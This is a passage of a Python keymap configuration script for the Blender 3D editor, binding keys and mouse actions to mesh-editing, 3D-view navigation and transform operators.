kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
# Map Mesh
km = kc.keymaps.new('Mesh', space_type='EMPTY', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('mesh.loopcut_slide', 'R', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.inset', 'I', 'PRESS')
kmi = km.keymap_items.new('mesh.poke', 'P', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', False)
kmi = km.keymap_items.new('mesh.bevel', 'B', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'vertex_only', True)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.loop_select', 'SELECTMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi = km.keymap_items.new('mesh.edgering_select', 'SELECTMOUSE', 'PRESS', shift=True, ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi = km.keymap_items.new('mesh.shortest_path_pick', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi.active = False
kmi = km.keymap_items.new('mesh.select_all', 'A', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'SELECT')
kmi = km.keymap_items.new('mesh.select_all', 'I', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'action', 'INVERT')
kmi = km.keymap_items.new('mesh.select_more', 'NUMPAD_PLUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_less', 'NUMPAD_MINUS', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_non_manifold', 'M', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('mesh.select_linked', 'L', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', ctrl=True)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi = km.keymap_items.new('mesh.faces_select_linked_flat', 'F', 'PRESS', shift=True, ctrl=True, alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_similar')
kmi = km.keymap_items.new('wm.call_menu', 'TAB', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_select_mode')
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS')
kmi_props_setattr(kmi.properties, 'unselected', False)
kmi = km.keymap_items.new('mesh.hide', 'H', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'unselected', True)
kmi = km.keymap_items.new('mesh.reveal', 'H', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', False)
kmi = km.keymap_items.new('mesh.normals_make_consistent', 'N', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'inside', True)
kmi = km.keymap_items.new('view3d.edit_mesh_extrude_move_normal', 'E', 'CLICK')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_extrude')
kmi = km.keymap_items.new('transform.edge_crease', 'E', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.spin', 'R', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.fill', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.beautify_fill', 'F', 'PRESS', shift=True, alt=True)
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'BEAUTY')
kmi_props_setattr(kmi.properties, 'ngon_method', 'BEAUTY')
kmi = km.keymap_items.new('mesh.quads_convert_to_tris', 'T', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'quad_method', 'FIXED')
kmi_props_setattr(kmi.properties, 'ngon_method', 'CLIP')
kmi = km.keymap_items.new('mesh.tris_convert_to_quads', 'J', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_move', 'V', 'PRESS')
kmi = km.keymap_items.new('mesh.rip_move_fill', 'V', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.rip_edge_move', 'D', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.merge', 'M', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.shrink_fatten', 'S', 'PRESS', alt=True)
kmi = km.keymap_items.new('mesh.edge_face_add', 'F', 'PRESS')
kmi = km.keymap_items.new('mesh.duplicate_move', 'D', 'PRESS', shift=True)
kmi = km.keymap_items.new('wm.call_menu', 'A', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'name', 'INFO_MT_mesh_add')
kmi = km.keymap_items.new('mesh.separate', 'P', 'PRESS')
kmi = km.keymap_items.new('mesh.split', 'Y', 'PRESS')
kmi = km.keymap_items.new('mesh.vert_connect_path', 'J', 'PRESS')
kmi = km.keymap_items.new('transform.vert_slide', 'V', 'PRESS', shift=True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'CLICK', ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', True)
kmi = km.keymap_items.new('mesh.dupli_extrude_cursor', 'ACTIONMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'rotate_source', False)
kmi = km.keymap_items.new('wm.call_menu', 'X', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('wm.call_menu', 'DEL', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_delete')
kmi = km.keymap_items.new('mesh.dissolve_mode', 'X', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.dissolve_mode', 'DEL', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('mesh.knife_tool', 'C', 'CLICK')
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', True)
kmi_props_setattr(kmi.properties, 'only_selected', False)
kmi = km.keymap_items.new('mesh.knife_tool', 'K', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_occlude_geometry', False)
kmi_props_setattr(kmi.properties, 'only_selected', True)
kmi = km.keymap_items.new('object.vertex_parent_set', 'P', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('wm.call_menu', 'W', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_specials')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'F', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi = km.keymap_items.new('wm.call_menu', 'E', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi = km.keymap_items.new('wm.call_menu', 'V', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi = km.keymap_items.new('wm.call_menu', 'H', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_hook')
kmi = km.keymap_items.new('wm.call_menu', 'U', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_uv_map')
kmi = km.keymap_items.new('wm.call_menu', 'G', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_vertex_group')
kmi = km.keymap_items.new('object.subdivision_set', 'ZERO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 0)
kmi = km.keymap_items.new('object.subdivision_set', 'ONE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 1)
kmi = km.keymap_items.new('object.subdivision_set', 'TWO', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 2)
kmi = km.keymap_items.new('object.subdivision_set', 'THREE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 3)
kmi = km.keymap_items.new('object.subdivision_set', 'FOUR', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 4)
kmi = km.keymap_items.new('object.subdivision_set', 'FIVE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'level', 5)
kmi = km.keymap_items.new('wm.context_cycle_enum', 'O', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit_falloff')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS')
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'ENABLED')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'O', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'data_path', 'tool_settings.proportional_edit')
kmi_props_setattr(kmi.properties, 'value_1', 'DISABLED')
kmi_props_setattr(kmi.properties, 'value_2', 'CONNECTED')
kmi = km.keymap_items.new('view3d.manipulator', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'release_confirm', True)
kmi = km.keymap_items.new('mesh.select_linked_pick', 'SELECTMOUSE', 'HOLD', shift=True)
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'CLICK')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'CLICK')
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi = km.keymap_items.new('mesh.select_mode', 'ONE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'use_expand', False)
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'TWO', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'EDGE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('mesh.select_mode', 'THREE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'use_extend', True)
kmi_props_setattr(kmi.properties, 'type', 'FACE')
kmi_props_setattr(kmi.properties, 'action', 'TOGGLE')
kmi = km.keymap_items.new('wm.call_menu', 'ONE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_vertices')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'TWO', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_edges')
kmi.active = False
kmi = km.keymap_items.new('wm.call_menu', 'THREE', 'DOUBLE_CLICK')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_edit_mesh_faces')
kmi.active = False
# Map 3D View
km = kc.keymaps.new('3D View', space_type='VIEW_3D', region_type='WINDOW', modal=False)
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('wm.call_menu', 'ACTIONMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'name', 'VIEW3D_MT_rRMB')
kmi = km.keymap_items.new('view3d.cursor3d', 'RIGHTMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.rotate', 'MIDDLEMOUSE', 'PRESS')
kmi = km.keymap_items.new('view3d.move', 'MIDDLEMOUSE', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'MIDDLEMOUSE', 'PRESS', ctrl=True)
kmi = km.keymap_items.new('view3d.dolly', 'MIDDLEMOUSE', 'PRESS', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'SPACE', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi = km.keymap_items.new('view3d.view_selected', 'NUMPAD_PERIOD', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_lock_to_active', 'NUMPAD_PERIOD', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_lock_clear', 'NUMPAD_PERIOD', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.navigate', 'F', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.smoothview', 'TIMER1', 'ANY', any=True)
kmi = km.keymap_items.new('view3d.rotate', 'TRACKPADPAN', 'ANY')
kmi = km.keymap_items.new('view3d.rotate', 'MOUSEROTATE', 'ANY')
kmi = km.keymap_items.new('view3d.move', 'TRACKPADPAN', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADZOOM', 'ANY')
kmi = km.keymap_items.new('view3d.zoom', 'TRACKPADPAN', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_PLUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'NUMPAD_MINUS', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'EQUAL', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'MINUS', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELINMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.zoom', 'WHEELOUTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_PLUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'NUMPAD_MINUS', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.dolly', 'EQUAL', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', 1)
kmi = km.keymap_items.new('view3d.dolly', 'MINUS', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'delta', -1)
kmi = km.keymap_items.new('view3d.zoom_camera_1_to_1', 'NUMPAD_ENTER', 'PRESS', shift=True)
kmi = km.keymap_items.new('view3d.view_center_camera', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_lock', 'HOME', 'PRESS')
kmi = km.keymap_items.new('view3d.view_center_cursor', 'HOME', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_center_pick', 'F', 'PRESS', alt=True)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS')
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'HOME', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'use_all_regions', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi = km.keymap_items.new('view3d.view_all', 'C', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'center', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_0', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'CAMERA')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_2', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_4', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_persportho', 'NUMPAD_5', 'PRESS')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_6', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.view_orbit', 'NUMPAD_8', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_2', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_4', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_6', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'NUMPAD_8', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_4', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'NUMPAD_6', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANRIGHT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'PANLEFT')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELUPMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANUP')
kmi = km.keymap_items.new('view3d.view_pan', 'WHEELDOWNMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'PANDOWN')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITLEFT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', ctrl=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITRIGHT')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELUPMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITUP')
kmi = km.keymap_items.new('view3d.view_orbit', 'WHEELDOWNMOUSE', 'PRESS', shift=True, alt=True)
kmi_props_setattr(kmi.properties, 'type', 'ORBITDOWN')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELUPMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLLEFT')
kmi = km.keymap_items.new('view3d.view_roll', 'WHEELDOWNMOUSE', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'ROLLTRIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_1', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_3', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NUMPAD_7', 'PRESS', shift=True, ctrl=True)
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.localview', 'NUMPAD_SLASH', 'PRESS')
kmi = km.keymap_items.new('view3d.ndof_orbit_zoom', 'NDOF_MOTION', 'ANY')
kmi = km.keymap_items.new('view3d.ndof_orbit', 'NDOF_MOTION', 'ANY', ctrl=True)
kmi = km.keymap_items.new('view3d.ndof_pan', 'NDOF_MOTION', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.ndof_all', 'NDOF_MOTION', 'ANY', shift=True, ctrl=True)
kmi = km.keymap_items.new('view3d.view_selected', 'NDOF_BUTTON_FIT', 'PRESS')
kmi_props_setattr(kmi.properties, 'use_all_regions', False)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CCW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', -1.5707963705062866)
kmi = km.keymap_items.new('view3d.view_roll', 'NDOF_BUTTON_ROLL_CW', 'PRESS')
kmi_props_setattr(kmi.properties, 'angle', 1.5707963705062866)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BACK', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BACK')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_LEFT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'LEFT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_BOTTOM', 'PRESS')
kmi_props_setattr(kmi.properties, 'type', 'BOTTOM')
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_FRONT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'FRONT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_RIGHT', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'RIGHT')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.viewnumpad', 'NDOF_BUTTON_TOP', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'type', 'TOP')
kmi_props_setattr(kmi.properties, 'align_active', True)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', shift=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', True)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', True)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', False)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_or_deselect_all', 'SELECTMOUSE', 'PRESS', alt=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi_props_setattr(kmi.properties, 'toggle', False)
kmi_props_setattr(kmi.properties, 'deselect', False)
kmi_props_setattr(kmi.properties, 'center', False)
kmi_props_setattr(kmi.properties, 'enumerate', True)
kmi_props_setattr(kmi.properties, 'object', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY')
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', shift=True)
kmi = km.keymap_items.new('view3d.select_border', 'EVT_TWEAK_S', 'ANY', ctrl=True)
kmi_props_setattr(kmi.properties, 'extend', False)
kmi = km.keymap_items.new('view3d.view_center_pick', 'MIDDLEMOUSE', 'PRESS', alt=True)
kmi = km.keymap_items.new('transform.translate', 'D', 'CLICK')
kmi = km.keymap_items.new('transform.resize', 'S', 'CLICK')
kmi = km.keymap_items.new('transform.rotate', 'A', 'CLICK')
kmi = km.keymap_items.new('wm.context_toggle_enum', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.viewport_shade')
kmi_props_setattr(kmi.properties, 'value_1', 'SOLID')
kmi_props_setattr(kmi.properties, 'value_2', 'WIREFRAME')
kmi.active = False
kmi = km.keymap_items.new('wm.context_toggle', 'Z', 'CLICK')
kmi_props_setattr(kmi.properties, 'data_path', 'space_data.use_occlude_geometry')
# Map Transform Modal Map
km = kc.keymaps.new('Transform Modal Map', space_type='EMPTY', region_type='WINDOW', modal=True)
kmi = km.keymap_items.new_modal('CANCEL', 'ESC', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'LEFTMOUSE', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'RET', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('CONFIRM', 'NUMPAD_ENTER', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('TRANSLATE', 'G', 'PRESS')
kmi = km.keymap_items.new_modal('ROTATE', 'R', 'PRESS')
kmi = km.keymap_items.new_modal('RESIZE', 'S', 'CLICK')
kmi = km.keymap_items.new_modal('SNAP_TOGGLE', 'TAB', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'LEFT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'LEFT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_ON', 'RIGHT_CTRL', 'PRESS', any=True)
kmi = km.keymap_items.new_modal('SNAP_INV_OFF', 'RIGHT_CTRL', 'RELEASE', any=True)
kmi = km.keymap_items.new_modal('ADD_SNAP', 'A', 'PRESS')
kmi = km.keymap_items.new_modal('REMOVE_SNAP', 'A', 'PRESS', alt=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS')
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_UP', 'PAGE_UP', 'PRESS', shift=True)
kmi = km.keymap_items.new_modal('PROPORTIONAL_SIZE_DOWN', 'PAGE_DOWN', 'PRESS', shift=True)
